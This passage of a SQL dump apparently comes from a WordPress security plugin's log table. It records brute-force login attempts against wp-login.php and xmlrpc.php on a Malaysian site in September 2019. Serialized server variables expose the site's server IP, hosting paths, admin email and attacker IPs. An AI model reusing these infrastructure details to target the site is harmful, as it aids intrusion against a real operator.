Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"149.202.204.104\";s:11:\"REMOTE_PORT\";s:5:\"36068\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX9rLXPgbK7GuRh1kKnDRQAAAI4\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568631597.859\";s:12:\"REQUEST_TIME\";s:10:\"1568631597\";}}','notice','2019-09-16 10:59:59','2019-09-16 10:59:58',18255792,19555608,'https://bintara.com.my/xmlrpc.php',1,0,'149.202.204.104'),(24080,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"88\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"150.95.52.70\";s:11:\"REMOTE_PORT\";s:5:\"35542\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX9tGXPgbK7GuRh1kKnEVQAAAIA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568632089.4537\";s:12:\"REQUEST_TIME\";s:10:\"1568632089\";}}','notice','2019-09-16 11:08:10','2019-09-16 11:08:09',17741240,19232008,'https://bintara.com.my/wp-login.php',1,0,'150.95.52.70'),(24081,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"150.95.52.70\";s:11:\"REMOTE_PORT\";s:5:\"36592\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX9tG71rBLb0GV3O7mTeNQAAAE0\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568632092.6884\";s:12:\"REQUEST_TIME\";s:10:\"1568632092\";}}','notice','2019-09-16 11:08:13','2019-09-16 11:08:13',18256624,19556376,'https://bintara.com.my/xmlrpc.php',1,0,'150.95.52.70'),(24082,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"96\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"213.122.172.69\";s:11:\"REMOTE_PORT\";s:5:\"29549\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX9tTGf5CPZPc3WLyou@eAAAAM8\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568632140.6293\";s:12:\"REQUEST_TIME\";s:10:\"1568632140\";}}','notice','2019-09-16 11:09:04','2019-09-16 11:09:03',17743200,19229200,'https://bintara.com.my/wp-login.php',1,0,'213.122.172.69'),(24083,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"96\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"213.122.172.69\";s:11:\"REMOTE_PORT\";s:5:\"29549\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX9tTGf5CPZPc3WLyou@eAAAAM8\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568632140.6293\";s:12:\"REQUEST_TIME\";s:10:\"1568632140\";}}','notice','2019-09-16 11:09:05','2019-09-16 11:09:03',17904784,19229200,'https://bintara.com.my/wp-login.php',1,0,'213.122.172.69'),(24084,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"213.122.172.69\";s:11:\"REMOTE_PORT\";s:5:\"31191\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX9tUnPgbK7GuRh1kKnEZgAAAIU\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568632148.4499\";s:12:\"REQUEST_TIME\";s:10:\"1568632148\";}}','notice','2019-09-16 11:09:14','2019-09-16 11:09:12',18351704,19650672,'https://bintara.com.my/xmlrpc.php',1,0,'213.122.172.69'),(24289,0,'brute_force','invalid-login::username-[login]','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:7:\"[login]\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"475\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"159.253.32.120\";s:11:\"REMOTE_PORT\";s:5:\"46286\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYAER2ShanGhHYaqyCTTDQAAAA8\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568670791.1412\";s:12:\"REQUEST_TIME\";s:10:\"1568670791\";}}','notice','2019-09-16 21:53:12','2019-09-16 21:53:11',18260088,19557024,'https://bintara.com.my/xmlrpc.php',1,0,'159.253.32.120'),(24290,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"27.118.21.254\";s:11:\"REMOTE_PORT\";s:5:\"37752\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYAGybIp53uPsY7BKArBNgAAAFc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568671433.6861\";s:12:\"REQUEST_TIME\";s:10:\"1568671433\";}}','notice','2019-09-16 22:03:54','2019-09-16 22:03:54',17740528,19230520,'https://bintara.com.my/wp-login.php',1,0,'27.118.21.254'),(24291,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"27.118.21.254\";s:11:\"REMOTE_PORT\";s:5:\"38504\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYAGzGShanGhHYaqyCTVKgAAABM\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568671436.2981\";s:12:\"REQUEST_TIME\";s:10:\"1568671436\";}}','notice','2019-09-16 22:03:57','2019-09-16 22:03:56',18260368,19558504,'https://bintara.com.my/xmlrpc.php',1,0,'27.118.21.254'),(24292,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"94\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 